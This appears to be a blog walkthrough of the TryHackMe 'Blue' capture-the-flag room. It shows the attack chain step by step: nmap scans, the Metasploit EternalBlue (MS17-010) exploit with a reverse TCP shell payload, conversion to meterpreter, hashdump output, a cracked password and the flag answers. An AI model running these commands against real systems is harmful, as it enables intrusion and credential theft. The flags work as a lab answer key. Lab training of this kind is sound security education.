THM – Blue CTF Room
This CTF challenge room is hosted by the team over at TryHackMe; it’ll take us from Recon, through exploitation and privilege escalation of the Windows box, then flag finding. We’ll be using nmap, Metasploit, EternalBlue payloads, system registries, hashdump and several other components.
The room’s description is ‘Deploy & hack into a Windows machine, leveraging common misconfigurations issues.’
Task 1- Recon
Q) How many ports are open with a port number under 1000?
CTF Task 1
Let’s run a quick nmap command, with a few switches that may be useful for later too.
sudo nmap 10.10.170.191 -sV -sC -O -Pn -p-1000 | tee nmap.txt
–sV for establishing service versions.
–sC for standard scripts
–O for OS detection (we’re expecting Window’s, obviously)
–Pn for ignoring ping scanning to determine if the host is up (we’re told it wont respond)
-p-1000 only scan first 1000 ports
The response:
Starting Nmap 7.92 ( https://nmap.org ) at 2021-01-14 03:55 EST
Nmap scan report for 10.10.170.191
Host is up (0.028s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/14%OT=135%CT=1%CU=30073%PV=Y%DS=2%DC=I%G=Y%TM=61E13B
OS:26%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS
OS:=7)OPS(O1=M505NW8ST11%O2=M505NW8ST11%O3=M505NW8NNT11%O4=M505NW8ST11%O5=M
OS:505NW8ST11%O6=M505ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=20
OS:00)ECN(R=Y%DF=Y%T=80%W=2000%O=M505NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y
OS:%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0
OS:%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 3h27m51s, median: -1s
| smb2-time:
| date: 2021-01-14T08:58:07
|_ start_date: 2021-01-14T08:42:47
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:e0:73:3d:1c:cd (unknown)
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-01-14T02:58:07-06:00
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.16 seconds
Q) How many ports are open with a port number under 1000?
A) 3
Next we’re asked to identify the vulnerabilty on the server. We can do this again from nmap, using it’s built in scripting engine.
Q) What is this machine vulnerable to?
(Answer in the form of: ms??-???, ex: ms08-067)
We can see from the question that the vulnerabilty is Microsoft based (‘ms’), and the obvious exposed service we previous saw was SMB. If we combine these two bits of information we can narrow down which scripts to run through nmap.
They’re all stored in /usr/share/nmap/scripts
We can run this command to test all SMB & MS focused vulnerabilities.
$ sudo nmap 10.10.170.191 --script=smb*ms* | tee nmap_script_smb.txt
This quickly responds with:
Starting Nmap 7.92 ( https://nmap.org ) at 2021-01-14 05:10 EST
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 94.20% done; ETC: 05:11 (0:00:00 remaining)
Nmap scan report for 10.10.170.191
Host is up (0.090s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 4.26 seconds
So we can see that the server is potentially vulnerably to the 2017 critical remote code execution vulnerability of Microsoft SMBv1 servers. This exploit has the CVE-2017-0143 (ms17-010).
Q) What is this machine vulnerable to?
(Answer in the form of: ms??-???, ex: ms08-067)
A) MS17-010
With this question answered, Task 1 Recon is complete.
Task 2) Gain Access
So it looks like TryHackMe wants us to use Metasploit to gain access toi this machine.
Use this command to fire up Metasploit
$ msfconsole
Q) Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
We’re then asked to find a payload that could exploit the vulnerabilty discovered during the recon phase. So lets search for it:
msf6 > search "MS17-010"
If that output is too hard to read, here’s a summary of the MS17-010 exploits:
Matching Modules
================
# Name
Description
0 exploit/windows/smb/ms17_010_eternalblue
EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec
SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command
SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010
SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce
Remote Code Execution
We can check out each module in more depth using the command info X (where X is the module # of the previous response).
If we look at the MS17_010_eternalblue module:
msf6 > info 0
Name: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Module: exploit/windows/smb/ms17_010_eternalblue
Platform: Windows
Arch: x64
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Average
Disclosed: 2017-03-14
Provided by: ...
Available targets:
Id Name
-- ----
0 Automatic Target
1 Windows 7
2 Windows Embedded Standard 7
3 Windows Server 2008 R2
4 Windows 8
5 Windows 8.1
6 Windows Server 2012
7 Windows 10 Pro
8 Windows 10 Enterprise Evaluation
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes
The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no
(Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no
(Optional) The password for the specified username
SMBUser no
(Optional) The username to authenticate as
VERIFY_ARCH true yes
Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes
Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload information:
Space: 2000
Description:
This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again. The module will attempt to use Anonymous login, by default, to authenticate to perform the exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use those instead. On some systems, this module may cause system instability and crashes, such as a BSOD or a reboot. This may be more likely with some payloads.
References: ...
Also known as: ETERNALBLUE
Seems like a good place to start.
Q) Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
A) exploit/windows/smb/ms17_010_eternalblue
Let’s use that exploit.
Q) Show options and set the one required value. What is the name of this value? (All caps for submission)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
...
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
We can see from the options that this exploit has 4 required options, however 3 come pre-populated. The one value it could never have a default value for is the host target.
Q) Show options and set the one required value. What is the name of this value? (All caps for submission)
A) RHOSTS
So we best set that:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.170.191
RHOSTS => 10.10.170.191
TryHackMe then asks us to specify the payload:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
Then we can run the exploit:
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.8.39.10:4444
[*] 10.10.130.233:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.130.233:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.130.233:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.130.233:445 - The target is vulnerable.
[*] 10.10.130.233:445 - Connecting to target for exploitation.
[+] 10.10.130.233:445 - Connection established for exploitation.
[+] 10.10.130.233:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.130.233:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.130.233:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.130.233:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.130.233:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.130.233:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.130.233:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.130.233:445 - Sending all but last fragment of exploit packet
[*] 10.10.130.233:445 - Starting non-paged pool grooming
[+] 10.10.130.233:445 - Sending SMBv2 buffers
[+] 10.10.130.233:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.130.233:445 - Sending final SMBv2 buffers.
[*] 10.10.130.233:445 - Sending last fragment of exploit packet!
[*] 10.10.130.233:445 - Receiving response from exploit packet
[+] 10.10.130.233:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.130.233:445 - Sending egg to corrupted connection.
[*] 10.10.130.233:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.130.233
[+] 10.10.130.233:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.130.233:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.130.233:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Command shell session 1 opened (10.8.39.10:4444 -> 10.10.130.233:49163 ) at 2021-01-14 06:04:14 -0500
Shell Banner:
Microsoft Windows [Version 6.1.7601]
And we get dropped into a DOS shell!
Our foothold on the Window’s server has been established.
Task 2 Troubleshooting
Myself and many others seem to get multiple issues with dropped the MS17-010 EternalBlue exploit onto the target.
I got dozens of FAIL messages.
Using the TryHackMe built in Linux AttachMachine provided a more reliable connection, so try that (it still wasn’t rock-solid though)
Task 3) Escalate
Now we’re on the box, can we escalate our privileges?
Q) If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
So lets do a bit of research:
- [Metasploit]Upgrade Normal Shell To Meterpreter Shell – Infosecwriteups
- How to Upgrade Command Shell to Meterpreter – HackingArticles
- TryHackMe! EternalBlue/MS17-010 in Metasploit – John Hammond
Q) If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
A) post/multi/manage/shell_to_meterpreter
If we use that module, we can re-run our options command to see which required field is left blank.
msf6 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit ...
LHOST no IP of host that ...
LPORT 4433 yes Port for payload to...
SESSION yes The session to run ...
We can see which sessions Metasploit has open currently:
Just the one, as expected.
No we have the SESSION option set, let’s run the meterpreter:
Eventually I had to resort to the THM built in machine. Finally the payload allowed for the meterpreter shell:
We were then able to execute ps and browse the current process list:
We could then migrate the cmd.exe service:
Task 4) Cracking
Now we’re really getting our teeth into the box.
Can we crack any of the local users passwords?
Q) Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so.
What is the name of the non-default user?
As suggested by the challenge, lets use the hashdump command:
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Q) Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so.
What is the name of the non-default user?
A) Jon
Okay Jon, how good is your password? We copy his password to a local file:
$ echo" Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" >> jon.txt
Then can run JohnTheRipper over it.
So Jon’s password is alqfna22
Task 5) Find the flags
Flag1? This flag can be found at the system root.
Well the system root for a Window’s box is usually assigned to the drive letter C:\
C:\>type flag1.txt
type flag1.txt
flag{access_the_machine}
Flag2? This flag can be found at the location where passwords are stored within Windows.
*Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.
Passwords are normally stored in the Registry, so lets take a look over there.
After a bit of hunting around… I overthought this, the flag was found in the Config folder:
C:\Windows\System32\config>type flag2.txt
type flag2.txt
flag{sam_database_elevated_access}
Flag 3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
Again I massively overthought this location. It simply means in Jon’s Documents folder:
C:\Users\Jon\Documents>type flag3.txt
type flag3.txt
flag{admin_documents_can_be_valuable}
Blue CTF Badge Acquired
There we have it – the TryHackMe Blue room is completed.
Fairly straight forward but rather annoying fragility on the target box. Rebooted that machine and my local Kali VM so many times.
Tools, scripts and commands used in exploiting this Windows box:
- nmap
- Metasploit
- MS17-010 / EternalBlue SMB exploit
- JohnTheRipper
- hashdump